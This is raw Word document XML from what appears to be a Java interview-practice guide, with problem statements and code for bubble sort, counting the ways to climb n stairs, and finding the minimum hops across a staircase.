      </w:r>
      <w:r w:rsidR="007928B7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Sort elements in array without inbuilt methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
    </w:p>
    <w:p w14:paraId="143E819E" w14:textId="2A38203D" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="003C562E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="003C562E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If you have an array of integers then how will you sort it? Write actual logic without using inbuilt Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF4307" w14:textId="3897F115" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F874FD"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nualSor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6ACC4D6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07FEB0"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bubbleSor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6C28193"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p>
    <w:p w14:paraId="2EF1C3DD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3B880"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Number of passes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9B75B"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j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j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omparisons in each pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FBE205"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j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F1AA9FD"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wap arr[j] and arr[j + 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF83663"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tem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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B47E2"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j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581193B9"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j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temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D0C54"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DAED07A"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680A99E"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0F7EF4F"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2A48C87"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB0074A"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514591B"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8</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB35A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B352CA5"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Original Array:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE708A"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alu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9301341"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valu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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745F9C7F"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303A5F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E025830"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xml:space="preserve">        bubbleSor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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDD50D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2FC42"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Sorted Array (Bubble Sort):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF45416"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alu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44A76E2"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valu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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF79FF"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7B7E076" w14:textId="7777777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D8195AD" w14:textId="78457F47" w:rsidR="007928B7" w:rsidRPr="00CE4B95"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3109F9A1" w14:textId="77777777" w:rsidR="007928B7" w:rsidRPr="00CE4B95" w:rsidRDefault="007928B7" w:rsidP="007928B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EF6CC0" w14:textId="2AA05AAA" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="_Toc196307843"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="005A6DBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="008A695E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ind distinct ways to reach the nth stair</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
    </w:p>
    <w:p w14:paraId="102BC603" w14:textId="3C5E0C05" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00684D1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00684D1F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a Java function to count the number of distinct ways to reach the nth stair by climbing either 1 or 2 steps at a time, and return the result modulo  10^9+7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5826C5" w14:textId="274CC67F" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0329D8E3" w14:textId="77777777" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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StairClimber</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7058BCBC" w14:textId="67600A67" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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stat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final</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MOD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1_000_000_007</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D6984" w14:textId="3446F7BD" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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publ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stat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countWays</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n</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0FD5B21D" w14:textId="4B31F364" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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if</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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&l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1</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return</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B33D99" w14:textId="790A97D1" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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prev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1</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curr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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F1596" w14:textId="12AFF654" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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for</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i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2</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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</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i</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1EFBF0D6" w14:textId="51693F2E" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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temp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prev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curr</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MOD</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253174F" w14:textId="006DC6FA" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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t xml:space="preserve">prev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curr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B21C2D" w14:textId="077C295A" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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t xml:space="preserve">curr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temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFA218" w14:textId="7629553B" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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7196D24F" w14:textId="64AB9E3C" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> curr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420F0447" w14:textId="5360057C" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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55240111" w14:textId="25BF4FC6" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="6149CAE1" w14:textId="16D4FDED" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Test the function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F9148B" w14:textId="173E2640" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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arg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7C960D88" w14:textId="4186D629" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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n1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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23920FF9" w14:textId="6912C753" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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n2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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B76C9" w14:textId="0C098D1E" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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System</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ou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println</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Ways to climb "</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n1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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>" stairs: "</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countWay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n1</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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88C0C1" w14:textId="3375BB7E" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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System</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ou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println</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Ways to climb "</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n2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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>" stairs: "</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countWay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n2</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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Output: 89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05578DC0" w14:textId="02F79A32" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718E215" w14:textId="7551797A" w:rsidR="00AB49E0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066E5FA" w14:textId="6F936980" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="_Toc196307844"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00B211BD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimum hops </w:t>
      </w:r>
      <w:r w:rsidR="008640F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00B211BD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> staircase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w14:paraId="26916364" w14:textId="6528FF95" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="0067596E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="0067596E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>There is a stair having total no of stairs as n. Requirement is to reach at the top in minimum hop. Each step has some value associated with it which shows how many steps you can move forward from that step. Find the minimum hop required to reach from 0th step to nth step. n= 6 and stairs = {2,0,1,3,1,1};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329EB651" w14:textId="287F69A0" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BDB1F2"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inimumHop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F6052EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A28E8"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minHop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ai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6E0522F"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ai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p>
    <w:p w14:paraId="66BD78F6"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0DD675CC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7771D352"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hop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p>
    <w:p w14:paraId="64C4E42D"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currentEn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he farthest we can reach with the current number of hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072880F"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farthes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he farthest we can reach at the next hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA8EFF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FACCE09"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36923C9"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Update the farthest we can reach from this step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E9AE2"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farthes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arthe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ai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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D880CE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD23B38"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f we have reached the end of the current jump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836D21F"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urrentEn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A27D5FD"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We need to make another hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754925DF"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hops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123EC97C"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currentEn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arthest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC45C10"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C8643"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f we can reach or go beyond the last stair, break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188797E0"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currentEnd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4DA368E"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reak</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BB8AE"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998D5E8"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753184C"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9D7EE7B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4BA7A"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f the farthest point we can reach is beyond the last stair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2B355"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currentEnd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hop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Return -1 if it's impossible to reach the last stair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36BBFD"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4D6B957"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91360A"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9D30C28"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air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Example input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50860B02"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resul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inHop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airs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41613992"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resul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9EA7AD1"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Minimum hops required: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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
